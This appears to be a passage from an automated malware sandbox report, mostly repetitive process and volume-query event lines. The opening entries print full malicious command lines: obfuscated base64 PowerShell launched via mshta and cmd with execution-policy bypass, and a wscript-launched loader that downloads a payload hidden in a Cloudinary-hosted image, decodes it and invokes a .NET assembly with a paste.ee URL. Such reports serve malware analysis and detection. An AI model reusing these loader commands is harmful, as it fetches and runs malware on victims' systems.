[void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jdh3ttj1vkqztsagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagieferc1uexbficagicagicagicagicagicagicagicagicagicagicagic1nrw1crxjkruzjtkluau9oicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxnt24ilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagiepazfbhrk1erxlmlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbcuhngc2jtusxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagcnosdwludcagicagicagicagicagicagicagicagicagicagicagicblwwhzleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbormjdzck7jyagicagicagicagicagicagicagicagicagicagicagicattkfnrsagicagicagicagicagicagicagicagicagicagicagicaivfzbavrzehaiicagicagicagicagicagicagicagicagicagicagicagic1uqw1lc3bby0ugicagicagicagicagicagicagicagicagicagicagicagdxpgvhjgrwwgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakohdnmnvwrdnnojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vntcumti5lju1ljiyns8ymjuvzwnvbm9tawn0agluz3nhcmvnb2luz2fyb3vuzhdpdghodxniyw5kd2l0agdvb2ruzxdzz3jlyxrmb3jldmvyewjvzhlnaxzlbi50suyilcikzu5wokfquerbvefczwnvbm9tawn0agluz3nhcmvnb2luz2fyb3vuzhdpdghodxniyw5kd2l0agdvb2ruzs52ynmildasmck7u3rbclqtu0xlrvaomyk7aw5wb0tfluvychjlu3njb24gicagicagicagicagicagicagicagicagicagicagicagiirltny6qvbqrefuqvxly29ub21py3roaw5nc2fyzwdvaw5nyxjvdw5kd2l0agh1c2jhbmr3axroz29vzg5llnzicyi='+[char]0x22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jdh3ttj1vkqztsagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagieferc1uexbficagicagicagicagicagicagicagicagicagicagicagic1nrw1crxjkruzjtkluau9oicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxnt24ilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagiepazfbhrk1erxlmlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbcuhngc2jtusxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagcnosdwludcagicagicagicagicagicagicagicagicagicagicagicblwwhzleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbormjdzck7jyagicagicagicagicagicagicagicagicagicagicagicattkfnrsagicagicagicagicagicagicagicagicagicagicagicaivfzbavrzehaiicagicagicagicagicagicagicagicagicagicagicagic1uqw1lc3bby0ugicagicagicagicagicagicagicagicagicagicagicagdxpgvhjgrwwgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakohdnmnvwrdnnojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vntcumti5lju1ljiyns8ymjuvzwnvbm9tawn0agluz3nhcmvnb2luz2fyb3vuzhdpdghodxniyw5kd2l0agdvb2ruzxdzz3jlyxrmb3jldmvyewjvzhlnaxzlbi50suyilcikzu5wokfquerbvefczwnvbm9tawn0agluz3nhcmvnb2luz2fyb3vuzhdpdghodxniyw5kd2l0agdvb2ruzs52ynmildasmck7u3rbclqtu0xlrvaomyk7aw5wb0tfluvychjlu3njb24gicagicagicagicagicagicagicagicagicagicagicagiirltny6qvbqrefuqvxly29ub21py3roaw5nc2fyzwdvaw5nyxjvdw5kd2l0agh1c2jhbmr3axroz29vzg5llnzicyi='+[char]0x22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };$antisiphonal = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$orlage = new-object system.net.webclient;$centralised = $orlage.downloaddata($antisiphonal);$slanshacks = [system.text.encoding]::utf8.getstring($centralised);$commends = '<<base64_start>>';$lemaitre = '<<base64_end>>';$ependymis = $slanshacks.indexof($commends);$transcolation = $slanshacks.indexof($lemaitre);$ependymis -ge 0 -and $transcolation -gt $ependymis;$ependymis += $commends.length;$scribblage = $transcolation - $ependymis;$dorsolumbar = $slanshacks.substring($ependymis, $scribblage);$keltologist = -join ($dorsolumbar.tochararray() \| foreach-object { $_ })[-1..-($dorsolumbar.length)];$carinately = [system.convert]::frombase64string($keltologist);$brite = [system.reflection.assembly]::load($carinately);$helygia = [dnlib.io.home].getmethod('vai');$helygia.invoke($null, @('0/qvvum/r/ee.etsap//:sptth', 'creance', 'creance', 'creance', 'caspol', 'creance', 'creance','creance','creance','creance','creance','creance','1','creance','taskname'));if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
